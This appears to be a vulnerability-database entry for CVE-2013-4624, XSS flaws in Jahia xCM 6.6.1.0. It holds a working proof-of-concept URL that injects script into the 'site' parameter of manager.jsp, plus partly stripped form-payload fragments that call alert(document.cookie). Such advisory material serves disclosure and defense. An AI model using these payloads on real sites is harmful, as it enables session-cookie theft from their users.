CVE-2013-4624
Published 2013-11-27
Priority: P4 · 19 · medium
CVSS 2.0: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
EXPLOIT
EPSS: 1.44% (69.9th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in Jahia xCM 6.6.1.0 before hotfix 7 allow remote attackers to inject arbitrary web script or HTML via (1) the site parameter to engines/manager.jsp, (2) the searchString parameter to administration/ in a search action, or the (3) username, (4) firstName, (5) lastName, (6) email, or (7) organization field to administration/ in a users action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jahia | jahia_xcm | — | — |
No detection rules found.
Exploit-DB
Jahia xCM - '/engines/manager.jsp?site' Cross-Site Scripting
exploitdb·2013-07-31
---
source: https://www.securityfocus.com/bid/61571/info
Jahia xCM is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Jahia xCM 6.6.1.0 r43343 is vulnerable; other versions may also be affected.
http://www.example.com/engines/manager.jsp?conf=repositoryexplorer&site=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Exploit-DB
Jahia xCM - '/administration/' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2013-07-31
---
source: https://www.securityfocus.com/bid/61571/info
Jahia xCM is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Jahia xCM 6.6.1.0 r43343 is vulnerable; other versions may also be affected.
alert(document.cookie);">
document.main.submit();
alert(document.cookie);">
alert(document.cookie);">
alert(document.cookie);">
alert(document.cookie);">
alert(document.cookie);">
document.main.submit();
No writeups or analysis indexed.